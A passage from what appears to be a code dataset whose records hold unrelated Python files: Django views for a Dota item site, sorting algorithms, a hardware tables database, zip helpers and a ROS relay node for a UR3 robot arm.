context)\n\ndef heroAPI(request):\n\t# Get hero name parameter\n\thero_name = request.GET.get('name')\n\n\t# Query a single hero using hero name\n\thero = Hero.objects.get(name__exact=hero_name)\n\n\t# Get all sets and all items that belong to this hero\n\tsets = Set.objects.filter(hero__exact=hero_name)\n\titems = Item.objects.filter(hero__exact=hero_name)\n\t\n # Create hero dictionary\n\td = OrderedDict()\n\td['name'] = hero.name.replace(\"_\", \" \").title()\n\td['description'] = hero.description\n\td['hero_type'] = hero.hero_type\n\td['strength'] = hero.strength\n\td['agility'] = hero.agility\n\td['intelligence'] = hero.intelligence\n\n\tsetlist = []\n\tfor hero_set in sets:\n\t\tsd = OrderedDict()\n\t\tsd['name'] = hero_set.name.replace(\"_\", \" \").title()\n\t\t#sd['price'] = 
hero_set.price\n\t\tsd['rarity'] = hero_set.rarity\n\t\tsd['pieces'] = hero_set.pieces\n\t\tsd['hero'] = hero_set.hero.replace(\"_\", \" \").title()\n\t\tsetlist.append(sd)\n\n\tsorted_sets = sorted(setlist, key= lambda k: k[\"name\"])\n\n\titemlist = []\n\tfor item in items:\n\t\tdi = OrderedDict()\n\t\tdi['name'] = item.name.replace(\"_\", \" \").title()\n\t\tdi['slot'] = item.slot.replace(\"_\", \" \").title()\n\t\t#di['price'] = item.price\n\t\tdi['rarity'] = item.rarity\n\t\tdi['item_set'] = item.item_set.replace(\"_\", \" \").title()\n\t\tdi['hero'] = item.hero.replace(\"_\", \" \").title()\n\t\titemlist.append(di)\n\n\tsorted_items = sorted(itemlist, key= lambda k: k[\"name\"])\n\n\td['sets'] = sorted_sets\n\td['items'] = sorted_items\n\n\treturn HttpResponse(json.dumps(d), content_type=\"application/json\")\n\ndef item(request):\n\t# Get item name parameter\n\titem_name = request.GET.get('name')\n\n\t# Query single item using item name\n\titem = Item.objects.get(name__exact=item_name)\n\n\t# Find 3 other (different) items that belong to the same hero\n\t_other_items = list(Item.objects.filter(hero__exact=item.hero))\n\tother_items = []\n\n\tset_belongs_to = Set.objects.get(name__exact=item.item_set)\n\tset_image_url = set_belongs_to.image_url\n\n\ti = 0\n\titems_added = 0\n\tlength = len(_other_items)\n\twhile(items_added < 3):\n\t\tif (_other_items[i].name != item_name):\n\t\t\tother_items.append(_other_items[i])\n\t\t\titems_added += 1\n\t\ti += 1\n\t\tif (i >= length):\n\t\t\tbreak\n\n\t# Build item dictionary\n\tcontext = {\n\t\t\"name\" : item.name.replace(\"_\",\" \").title(),\n\t\t\"slot\" : item.slot.title(),\n\t\t\"rarity\" : item.rarity,\n\t\t\"item_set\" : item.item_set.replace(\"_\", \" \").title(),\n\t\t\"hero\" : item.hero.replace(\"_\", \" \").title(),\n\t\t\"other_items\" : other_items,\n\t\t\"set_image_url\" : set_image_url,\n\t\t\"item_image_url\" : item.image_url }\n\n\treturn render(request, \"item.html\", context)\n\ndef itemAPI(request):\n\t# Get item name parameter\n\titem_name = request.GET.get('name')\n\n\t# Query single item using item name\n\titem = Item.objects.get(name__exact=item_name)\n\t# Build item dictionary\n\td = OrderedDict()\n\n\td['name'] = item.name.replace(\"_\",\" \").title()\n\td['slot'] = item.slot\n\td['rarity'] = item.rarity\n\td['item_set'] = item.item_set.replace(\"_\", \" \").title()\n\td['hero'] = item.hero.replace(\"_\", \" \").title()\n\n\treturn HttpResponse(json.dumps(d), content_type=\"application/json\")\n\n\ndef set(request):\n\t# Get set name parameter\n\tset_name = request.GET.get('name')\n\n\t# Query single hero set using set name\n\thero_set = Set.objects.get(name__exact=set_name)\n\t# Get all items that comprise this set\n\titems_in_set = Item.objects.filter(item_set__exact=set_name)\n\n\t# Build item set dictionary\n\tcontext = {\n\t\t\"name\" : hero_set.name.replace(\"_\", \" \").title(),\n\t\t\"creation_date\" : hero_set.creation_date,\n\t\t\"rarity\" : hero_set.rarity,\n\t\t\"pieces\" : hero_set.pieces,\n\t\t\"hero\" : hero_set.hero.replace(\"_\", \" \").title(),\n\t\t\"item_set\" : items_in_set,\n\t\t\"set_image_url\" : hero_set.image_url }\n\n\treturn render(request, \"set.html\", context)\n\n\ndef setAPI(request):\n\t# Get set name parameter\n\tset_name = request.GET.get('name')\n\t# Query single hero set using set name\n\thero_set = Set.objects.get(name__exact=set_name)\n\t# Get all items that comprise this set\n\titems_in_set = Item.objects.filter(item_set__exact=set_name)\n\n\t# Build item set dictionary\n\td = 
OrderedDict()\n\td['name'] = hero_set.name.replace(\"_\", \" \").title()\n\td['creation_date'] = hero_set.creation_date\n\td['rarity'] = hero_set.rarity\n\td['pieces'] = hero_set.pieces\n\td['hero'] = hero_set.hero.replace(\"_\", \" \").title()\n\td['set_image_url'] = hero_set.image_url\n\n\titemlist = []\n\tfor item in items_in_set :\n\t\tdi = OrderedDict()\n\t\tdi['name'] = item.name.replace(\"_\", \" \").title()\n\t\tdi['slot'] = item.slot.replace(\"_\", \" \").title()\n\t\t#di['price'] = item.price\n\t\tdi['rarity'] = item.rarity\n\t\tdi['item_set'] = item.item_set.replace(\"_\", \" \").title()\n\t\tdi['hero'] = item.hero.replace(\"_\", \" \").title()\n\t\titemlist.append(di)\n\n\n\tsorted_items = sorted(itemlist, key= lambda k: k[\"name\"])\n\td['item_set'] = sorted_items\n\treturn HttpResponse(json.dumps(d), content_type=\"application/json\")\n\nignore_words = [\"of\", \"the\", \"from\", \"set\", \"is\", \"if\", \"and\", \"or\", \"but\"]\nfilter_words = [\"more\", \"less\", \"with\",\n\t\t\t\t \"common\", \"uncommon\", \"rare\", \"mythical\", \"legendary\", \"ancient\", \"immortal\", \"arcana\"]\n\ndef search_results(request):\n\tnum_results = 0\n\tsearch_term = request.GET.get('search_term')\n\toriginal_term = search_term\n\t\n\trelevant_heroes_and = []\n\trelevant_heroes_or = []\n\n\trelevant_sets_and = []\n\trelevant_sets_or = []\n\n\trelevant_items_and = []\n\trelevant_items_or = []\n\n\t# Get exact matches first, if they exist\n\tsearch_term = \" \".join(search_term.split()).lower()\n\tsearch_exact = search_term.replace(\" \", \"_\")\n\texact_hero = None\n\texact_item = None\n\texact_set = None\n\ttry:\n\t\texact_hero = Hero.objects.get(name__exact=search_exact)\n\texcept:\n\t\texact_hero = None\n\tif exact_hero == None:\n\t\ttry:\n\t\t\texact_set = Set.objects.get(name__exact=search_exact)\n\t\texcept:\n\t\t\texact_set = None\n\t\tif exact_set == None:\n\t\t\ttry:\n\t\t\t\texact_item = Item.objects.get(name__exact=search_exact)\n\t\t\texcept:\n\t\t\t\texact_item = None\n\n\n\tsearch_terms = search_term.split(\" \")\n\tfor word in ignore_words:\n\t\tsearch_term = search_term.replace(word, \"\")\n\tsearch_term = \" \".join(search_term.split())\n\tsearch_terms = search_term.split(\" \")\n\n\tall_heroes = Hero.objects.all()\n\tall_sets = Set.objects.all()\n\tall_items = Item.objects.all()\n\n\tif (len(search_term) > 1):\n\n\t\t# AND searches (contains all words in the search terms)\n\t\t# =====================================================\n\t\t# Hero AND searches\n\t\tfor hero in all_heroes:\n\t\t\tcontains_all = True\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\t# !!! Get context of match if a match is found\n\t\t\t\tmatch = ((term_original in hero.name and length > 2) or term in hero.description.lower() or term_original in hero.hero_type)\n\t\t\t\t\n\t\t\t\tif not match:\n\t\t\t\t\tcontains_all = False\n\t\t\t\t\tbreak\n\n\t\t\tif contains_all and hero not in relevant_heroes_and and hero != exact_hero:\n\t\t\t\trelevant_heroes_and.append(hero)\n\t\t\t\tnum_results += 1\n\n\t\t# Item AND searches\n\t\tfor item in all_items:\n\t\t\tcontains_all = True\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\t# !!! 
Get context of match if a match is found\n\t\t\t\tmatch = (length > 2) and (term_original in item.name or term_original in item.hero or term_original in item.rarity.lower())\n\t\t\t\t\n\t\t\t\tif not match:\n\t\t\t\t\tcontains_all = False\n\t\t\t\t\tbreak\n\n\t\t\tif contains_all and item not in relevant_items_and and item != exact_item:\n\t\t\t\trelevant_items_and.append(item)\n\t\t\t\tnum_results += 1\n\n\t\t# Set AND searches\n\t\tfor _set in all_sets:\n\t\t\tcontains_all = True\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\t# !!! Get context of match if a match is found\n\t\t\t\tmatch = (length > 2) and (term_original in _set.name or term_original in _set.hero or term_original in _set.rarity.lower())\n\t\t\t\t\n\t\t\t\tif not match:\n\t\t\t\t\tcontains_all = False\n\t\t\t\t\tbreak\n\n\t\t\tif contains_all and _set not in relevant_sets_and and _set != exact_set:\n\t\t\t\trelevant_sets_and.append(_set)\n\t\t\t\tnum_results += 1\n\n\t\t# ============================================================\n\n\n\t\t# OR searches (contains at least one of the words in the search terms)\n\t\t# ====================================================================\n\n\t\t# Hero OR searches\n\t\tfor hero in all_heroes:\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\tif ((term_original in hero.name and length > 2) or (term in hero.description.lower()) or (term_original in hero.hero_type)):\n\t\t\t\t\tif hero not in relevant_heroes_and and hero != exact_hero:\n\t\t\t\t\t\trelevant_heroes_or.append(hero)\n\t\t\t\t\t\tnum_results += 1\n\t\t\t\t\t\tbreak\n\n\t\t# Item OR searches\n\t\tfor item in all_items:\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\tif (term_original in item.name and length > 2) or (term_original in item.hero and length > 2) or (term_original in item.rarity.lower() and length > 2):\n\t\t\t\t\tif item not in relevant_items_and and item != exact_item:\n\t\t\t\t\t\trelevant_items_or.append(item)\n\t\t\t\t\t\tnum_results += 1\n\t\t\t\t\t\tbreak\n\n\t\t# Set OR searches\n\t\tfor _set in all_sets:\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\tif (term_original in _set.name and length > 2) or (term_original in _set.hero and length > 2) or term_original in _set.rarity.lower():\n\t\t\t\t\tif _set not in relevant_sets_and and _set != exact_set:\n\t\t\t\t\t\trelevant_sets_or.append(_set)\n\t\t\t\t\t\tnum_results += 1\n\t\t\t\t\t\tbreak\n\n\t\t# =====================================================================\n\n\t# The final results\n\thero_results_and = []\n\thero_results_or = []\n\n\titem_results_and = []\n\titem_results_or = []\n\n\tset_results_and = []\n\tset_results_or = []\n\n\texact_set_result = {}\n\texact_hero_result = {}\n\texact_item_result = {}\n\n\tif (exact_hero != None):\n\t\tnum_results += 1\n\t\texact_hero_result = {\n\t\t\t\"name\" : exact_hero.name.replace(\"_\", \" \").title(),\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\telif (exact_set != None):\n\t\tnum_results += 1\n\t\texact_set_result = {\n\t\t\t\"name\" : exact_set.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : exact_set.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\telif (exact_item != 
None):\n\t\tnum_results += 1\n\t\texact_item_result = {\n\t\t\t\"name\" : exact_item.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : exact_item.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\n\n\t# Build AND results\n\tfor hero in relevant_heroes_and:\n\t\td = {\n\t\t\t\"name\" : hero.name.replace(\"_\", \" \").title(),\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\thero_results_and.append(d)\n\n\tfor _set in relevant_sets_and:\n\t\td = {\n\t\t\t\"name\" : _set.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : _set.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\tset_results_and.append(d)\n\n\tfor item in relevant_items_and:\n\t\td = {\n\t\t\t\"name\" : item.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : item.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\titem_results_and.append(d)\n\n\n\t# Build OR results\n\tfor hero in relevant_heroes_or:\n\t\td = {\n\t\t\t\"name\" : hero.name.replace(\"_\", \" \").title(),\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\thero_results_or.append(d)\n\n\tfor _set in relevant_sets_or:\n\t\td = {\n\t\t\t\"name\" : _set.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : _set.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\tset_results_or.append(d)\n\n\tfor item in relevant_items_or:\n\t\td = {\n\t\t\t\"name\" : item.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : item.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\titem_results_or.append(d)\n\n\n\t# Build context\n\tcontext = {\n\t\t\"original_term\" : original_term,\n\t\t\"all_search_terms\" : search_terms,\n\t\t\"hero_results_and\" : hero_results_and,\n\t\t\"set_results_and\" : set_results_and,\n\t\t\"item_results_and\" : item_results_and,\n\t\t\"hero_results_or\" : hero_results_or,\n\t\t\"set_results_or\" : set_results_or,\n\t\t\"item_results_or\" : item_results_or,\n\t\t\"exact_hero_result\" : exact_hero_result,\n\t\t\"exact_set_result\" : exact_set_result,\n\t\t\"exact_item_result\" : exact_item_result,\n\t\t\"num_results\" : num_results,\n\t\t\"num_and_results\" : len(hero_results_and) + len(set_results_and) + len(item_results_and),\n\t\t\"num_or_results\" : len(hero_results_or) + len(set_results_or) + len(item_results_or)\n\t}\n\n\treturn render(request, \"search_results.html\", context)\n\ndef runtests(request):\n #context = {\"results\": tests.runtests()}\n #return render(request, \"runtests.html\", context)\n #return HttpResponse(tests.runtests(), content_type=\"application/json\")\n #test_results = tests.runtests()\n #return HttpResponse(test_results['results'])\n return HttpResponse(tests.runtests())\n\n","sub_path":"dota/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105425793","text":"\n\n#calss header\nclass _MERINGUE():\n\tdef __init__(self,): \n\t\tself.name = \"MERINGUE\"\n\t\tself.definitions = [u'a very light, sweet food made by mixing sugar with egg white (= the clear part) and baking it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_meringue.py","file_name":"_meringue.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
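# The search view above tiers its matching: exact name first, then records
# containing ALL query terms, then records containing ANY term. A minimal
# standalone sketch of that tiering, assuming plain dicts with a 'name' key
# rather than the Django models the app actually queries:
def tiered_search(records, query, ignore_words=('of', 'the', 'from', 'set')):
    terms = [t for t in query.lower().split() if t not in ignore_words]
    exact_key = query.lower().strip().replace(' ', '_')
    # Tier 1: exact match on the normalized name
    exact = [r for r in records if r['name'].lower() == exact_key]
    # Tier 2: AND match (every remaining term appears in the name)
    and_hits = [r for r in records if r not in exact
                and terms and all(t in r['name'].lower() for t in terms)]
    # Tier 3: OR match (at least one term appears, not already matched)
    or_hits = [r for r in records if r not in exact and r not in and_hits
               and any(t in r['name'].lower() for t in terms)]
    return exact, and_hits, or_hits

# e.g. tiered_search([{'name': 'wraith_king'}], 'wraith king') places the
# record in the exact tier, mirroring the view's Hero/Set/Item lookups.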
+{"seq_id":"362967307","text":"\"\"\"\n排序\n\"\"\"\ntemp_array = [8, 3, 5, 6, 2, 7, 5, 9, 1]\n\n\n# 直接插入排序\ndef insertSort(array):\n i = 1\n while i < len(array):\n # 对第i个进行插入\n val = array[i]\n # 插入位置 从第i个前一个往前寻找位置\n j = i - 1\n while j >= 0 and array[j] > val:\n # 比当前值大的往后移\n array[j + 1] = array[j]\n j = j - 1\n # 放入正确的位置\n array[j + 1] = val\n i += 1\n print(array)\n return array\n\n\n# 希尔排序\n# 对间隔n个值进行直接插入排序,缩小间隔到1,完成整个排序\ndef shellSort(array):\n # 初始间隔为数组长度的一半\n len_ = int(len(array) / 2)\n while len_ >= 1:\n i = len_\n while i < len(array):\n # 对每组进行直接插入排序\n temp = array[i]\n j = i - len_\n while (j >= 0 and array[j] > temp):\n array[j + len_] = array[j]\n j -= len_\n\n array[j + len_] = temp\n i += 1\n # 缩小间隔\n len_ = int(len_ / 2)\n print(array)\n return array\n\n\n# 快速排序\n\"\"\"\n先从待排序的数组中找出一个数作为基准数(取第一个数即可),然后将原来的数组划分成两部分:\n小于基准数的左子数组和大于等于基准数的右子数组。\n然后对这两个子数组再递归重复上述过程,直到两个子数组的所有数都分别有序。\n最后返回“左子数组” + “基准数” + “右子数组”,即是最终排序好的数组。\n\"\"\"\n\n\n# 实现快排\ndef quicksort(nums):\n if len(nums) <= 1:\n return nums\n\n # 左子数组\n less = []\n # 右子数组\n greater = []\n # 基准数\n base = nums.pop()\n\n # 对原数组进行划分\n for x in nums:\n if x < base:\n less.append(x)\n else:\n greater.append(x)\n\n print(less + [base] + greater)\n # 递归调用\n return quicksort(less) + [base] + quicksort(greater)\n\n\nprint(temp_array)\nprint(insertSort(temp_array))\nprint('-----------')\n# print(shellSort(temp_array))\nprint('-----------')\n# print(quicksort(temp_array))\n","sub_path":"algorithm/sort_.py","file_name":"sort_.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"518711189","text":"\"\"\"\n$Copyright (c) 2019 Broadcom. All rights reserved. The term\n\"Broadcom\" refers to Broadcom Inc. and/or its subsidiaries.\n\nSee LICENSE.rst file in the $NCS_ROOT directory for full license\ninformation.$\n\"\"\"\n\n\"\"\"Database of Tables.\n\nThis module provides a way to add tables to the TablesDB class. The tables\nare usually loaded from a file contains specific tables information.\nThe user can further search whether a table name exists in the database and\nget a specified table information from the database.\n\"\"\"\n\ndef format_val(val):\n \"\"\"Format a scalr value to a string.\n\n If the value is less than 10, the value string will be in decimal format.\n Otherwise the value string will be in hexadecimal format. For the value\n which is greater than 32-bit, an underscore will be used to separate each\n 32-bit word for better readability.\n \"\"\"\n if val < 10:\n return str(val)\n else:\n val_str = \"0x%x\" % (val)\n if len(val_str) <= 10:\n fmt_str = val_str\n else:\n fmt_str = ''\n while len(val_str) > 10:\n if fmt_str == '':\n fmt_str = val_str[-8:]\n else:\n fmt_str = val_str[-8:] + '_' + fmt_str\n val_str = val_str[:-8]\n fmt_str = val_str + '_' + fmt_str\n return fmt_str\n\n\nclass TablesDB():\n 'Tables database class.'\n def __init__(self):\n self.tables = {}\n\n def __table_virtual_field_add(self, field, minval, maxval, tag, **table):\n \"\"\"Add virtual field information.\n\n Fields information are usually fixed when tables are added to the\n database. 
This method provides a way to add customized field to a\n specified table with virtual field attribute.\n \"\"\"\n table['FIELDS'][field] = {}\n table['FIELDS'][field]['_VIRTUAL'] = 1\n table['FIELDS'][field]['_MINVAL'] = minval\n table['FIELDS'][field]['_MAXVAL'] = maxval\n table['FIELDS'][field]['DESC'] = 'Index'\n if tag is not None:\n table['FIELDS'][field]['TAG'] = tag\n\n def tables_add(self, **tables):\n 'Add tables to the database.'\n for table in tables:\n # Check whether the table is a special function table\n tables[table]['IS_SFT'] = False\n# for field in tables[table]['FIELDS']:\n# if 'TAG' in tables[table]['FIELDS'][field]:\n# if 'bus_select' == tables[table]['FIELDS'][field]['TAG']:\n# #tables[table]['IS_SFT'] = True\n# break\n if '_INDEX' not in tables[table]['FIELDS']:\n if 'MINIDX' in tables[table] and 'MAXIDX' in tables[table]:\n minval = tables[table]['MINIDX']\n maxval = tables[table]['MAXIDX']\n else:\n minval = maxval = 0\n tag = 'direct_index'\n self.__table_virtual_field_add(\n '_INDEX', minval, maxval, tag, **tables[table])\n self.tables.update(tables)\n\n def registers_add(self, **registers):\n 'Add registers as tables to the database.'\n for register in registers:\n # indicate not special Function\n registers[register]['IS_SFT'] = False\n\n for field in registers[register]['FIELDS']:\n # add TAG data\n registers[register]['FIELDS'][field]['TAG'] = 'data'\n\n if '_INDEX' not in registers[register]['FIELDS']:\n if 'MINIDX' in registers[register] and 'MAXIDX' in registers[register]:\n minval = registers[register]['MINIDX']\n maxval = registers[register]['MAXIDX']\n else:\n minval = maxval = 0\n tag = 'direct_index'\n self.__table_virtual_field_add(\n '_INDEX', minval, maxval, tag, **registers[register])\n self.tables.update(registers)\n\n def tables_search(self, name, src = None):\n \"\"\"Search tables in database.\n\n Return the searched result table name(s) in list.\n If the search name is '*', all tables in the database will be returned.\n If the search name starts with '@', an exact match will be used to\n search for the specified name.\n If the search name starts with '^', match-from-start will be used to\n search for the specified table name.\n Otherwise the specified name will be searched in sub-string match.\n \"\"\"\n if name == '*':\n match_str = ''\n elif name[0] == '@':\n match_str = name[1:].lower()\n elif name[0] == '^':\n match_str = name[1:].lower()\n else:\n match_str = name.lower()\n match_tables = []\n for table in self.tables:\n if self.tables[table]['IS_SFT']:\n # Skip special function tables\n continue\n if src and self.tables[table]['OBJ_SOURCE'] != src:\n continue\n if name == '*':\n # Match for all tables\n match_tables.append(table)\n elif name[0] == '@':\n # Exact match\n if match_str == table.lower():\n match_tables.append(table)\n elif name[0] == '^':\n # Match from the start\n if table.lower().startswith(match_str):\n match_tables.append(table)\n else:\n # Substring match\n if match_str in table.lower():\n match_tables.append(table)\n return sorted(match_tables)\n\n def table_get(self, name):\n 'Get a specified table information.'\n lname = name.lower()\n for table in sorted(self.tables):\n if table.lower() == lname:\n return table, self.tables[table]['BM_SID'], self.tables[table]\n return None, None, None\n\n def table_info_get(self, table, fmt=None):\n 'Get a specified table information in formatted string.'\n if table not in self.tables:\n return ''\n # Table name\n info = \"{}\\n\".format(table)\n if fmt == 'brief':\n return 
info\n\n # display table description\n if 'DESC' in self.tables[table]:\n descr = self.tables[table]['DESC']\n else:\n descr = ''\n info += \" Description: {}\\n\".format(descr)\n \n fields = self.tables[table]['FIELDS']\n info += \" {:d} fields:\\n\".format(len(fields))\n for field in sorted(fields):\n # Field name\n info += \" {}\\n\".format(field)\n\n # display field description\n if 'DESC' in fields[field]:\n descr = fields[field]['DESC']\n else:\n descr = ''\n info += \" Description: {}\\n\".format(descr)\n \n if fmt == 'long':\n # Field information\n if 'TAG' in fields[field]:\n tag = fields[field]['TAG']\n else:\n tag = 'N/A'\n if 'MAXBIT' in fields[field] and 'MINBIT' in fields[field]:\n width = \\\n fields[field]['MAXBIT'] - fields[field]['MINBIT'] + 1\n bit = 'bit'\n if width > 1:\n bit += 's'\n info += \" Width: {} {}\\n\".format(width, bit)\n maxstr = format_val((1 << width) - 1)\n info += \" Value (default, min, max): \" \\\n \"0, 0, {}\\n\".format(maxstr)\n info += \" Attribute: {}\\n\".format(tag)\n elif '_MINVAL' in fields[field] and '_MAXVAL' in fields[field]:\n info += \" Width: N/A\\n\"\n info += \" Value (default, min, max): \" \\\n \"{0}, {0}, {1}\\n\".format(fields[field]['_MINVAL'],\n fields[field]['_MAXVAL'])\n info += \" Attribute: {}\\n\".format(tag)\n return info\n\n def table_fields(self, table):\n 'Table fields generator.'\n if table not in self.tables:\n yield\n else:\n for field in self.tables[table]['FIELDS']:\n yield field\n\n","sub_path":"ncsc-1.3.3rc4/bmi/cli/ltm/tablesdb.py","file_name":"tablesdb.py","file_ext":"py","file_size_in_byte":8395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118776407","text":"import os\nimport sys\nimport zipfile\n\n#\n# def rename(pwd: str, filename=''):\n# \"\"\"压缩包内部文件有中文名, 解压后出现乱码,进行恢复\"\"\"\n#\n# path = f'{pwd}/{filename}'\n# if os.path.isdir(path):\n# for i in os.scandir(path):\n# rename(path, i.name)\n# newname = filename.encode('cp437').decode('gbk')\n# os.rename(path, f'{pwd}/{newname}')\n\n\n\"\"\"\nzip文件解压缩\n\nhttps://docs.python.org/zh-cn/3.9/library/zipfile.html?highlight=zipfile#\n\n\n\"\"\"\n\nimport zipfile\nfrom pyefun import *\nimport pyefun.commonlyUtil as commonlyUtil\n\n@异常处理返回类型逻辑型\ndef zip解压(压缩包的路径: str, 解压路径: str):\n file = zipfile.ZipFile(压缩包的路径)\n if 文件是否存在(解压路径) == False:\n commonlyUtil.目录_创建(解压路径)\n file.extractall(解压路径)\n file.close()\n\n\n@异常处理返回类型逻辑型\ndef zip压缩(保存压缩包的路径: str, 欲压缩文件或者文件夹: str,mode=\"w\"):\n pass\n 保存压缩包的路径 = 路径优化(保存压缩包的路径)\n 欲压缩文件或者文件夹 = 路径优化(欲压缩文件或者文件夹)\n 路径字符长度 = 取文本长度(欲压缩文件或者文件夹)\n if 文件_是否为文件(欲压缩文件或者文件夹):\n with zipfile.ZipFile(保存压缩包的路径, mode=mode) as target:\n target.write(欲压缩文件或者文件夹, 文件_取文件名(欲压缩文件或者文件夹))\n return True\n if 文件_是否为目录(欲压缩文件或者文件夹):\n with zipfile.ZipFile(保存压缩包的路径, mode=mode) as target:\n 压缩文件列表 = []\n for 路径信息 in os.walk(欲压缩文件或者文件夹):\n for 文件名 in 路径信息[2]:\n 目录 = 路径信息[0]\n 文件路径 = 路径_合并(目录, 文件名)\n 相对路径 = 取文本右边(文件路径, 取文本长度(文件路径) - 路径字符长度)\n if(文件路径 == 保存压缩包的路径):\n continue\n # 防止死循环一直压缩\n 压缩文件列表.append([文件路径,相对路径])\n\n # 开始压缩\n for item in 压缩文件列表:\n 文件路径 = item[0]\n 相对路径 = item[1]\n target.write(文件路径, 相对路径)\n return True\n","sub_path":"pyefun/encoding/compress/zip.py","file_name":"zip.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"358994003","text":"#! 
/usr/bin/env python\nfrom __future__ import print_function\n\nimport sys\nimport copy\nimport rospy\nimport moveit_commander\nimport moveit_msgs.msg as moveit_msg_lib\nimport std_msgs.msg as standard_mag_lib\nimport geometry_msgs.msg as geometry_msg_lib\nfrom math import pi\nfrom math import radians\nfrom std_msgs.msg import String\nfrom moveit_commander.conversions import pose_to_list\n\nfrom ur3_robotics.msg import UR3Joints\n\nrobot_model = \"UR3\"\n\nrobot, scene, move_group, display_trajectory_publisher, planning_frame, eef_link, group_names = None, None, None, None, None, None, None\n\ndef setup_robot(info, **kwargs):\n global robot, scene, move_group, display_trajectory_publisher, planning_frame, eef_link, group_names\n moveit_commander.roscpp_initialize(sys.argv)\n #rospy.init_node('ur3_main_node', anonymous=True)\n robot = moveit_commander.RobotCommander()\n scene = moveit_commander.PlanningSceneInterface()\n group_name = kwargs.get('movegroup', 'manipulator')\n move_group = moveit_commander.MoveGroupCommander(group_name)\n display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path'\n , moveit_msg_lib.DisplayTrajectory\n , queue_size=20)\n\n planning_frame = move_group.get_planning_frame()\n eef_link = move_group.get_end_effector_link()\n group_names = robot.get_group_names()\n\n if info:\n print('==== Reference frame: {}'.format(planning_frame))\n print('==== End effector ==: {}'.format(eef_link))\n print('==== Robot groups ==: {}'.format(group_names))\n print('==== Robot state ===: {}'.format(robot.get_current_state()))\n\ndef go_to_joint_goal(data):\n\n if info:\n print('==== Joint state from unity: \\n'\n 'joint base: {}\\n'\n 'joint shoulder: {}\\n'\n 'joint elbow: {}\\n'\n 'joint wrist1: {}\\n'\n 'joint wrist2: {}\\n'\n 'joint wrist3: {}\\n'\n .format(data.joint_base, data.joint_shoulder, data.joint_elbow,\n data.joint_wrist1, data.joint_wrist2, data.joint_wrist3))\n\n joint_state = []\n joint_state.append(radians(data.joint_base))\n joint_state.append(radians(data.joint_shoulder))\n joint_state.append(radians(data.joint_elbow))\n joint_state.append( radians(data.joint_wrist1))\n joint_state.append(radians(data.joint_wrist2))\n joint_state.append(radians(data.joint_wrist3))\n\n move_group.go(joint_state, wait=True)\n\n move_group.stop()\n\ndef callback(joint_data):\n if info:\n rospy.loginfo('\\n raw info from unity: {}\\n'.format(joint_data))\n go_to_joint_goal(joint_data)\n if info:\n rospy.loginfo('\\nexecution sucess\\n')\n\n\ndef listen_and_move_robot():\n rospy.init_node('relay_node', anonymous=True)\n rospy.Subscriber('joint_state', UR3Joints, callback)\n rospy.spin()\n\nif __name__ == '__main__':\n info = True\n print(\"you receive some system arguments: {}\".format(sys.argv))\n setup_robot(info=True, movegroup='manipulator')\n listen_and_move_robot()\n","sub_path":"src/robot_driver/scripts/relay.py","file_name":"relay.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"424996707","text":"\"\"\"\n Thực hiện code lại hàm sau và cho biết ý nghĩa của nó\ndef enter_data():\n while True:\n n = input(\"Nhập 1 số nguyên: \")\n if n.isnumeric():\n n = int(n)\n if n > 0:\n print(\"Đã nhập số dương\")\n return n\n print(\"Đã nhập số không dương. 
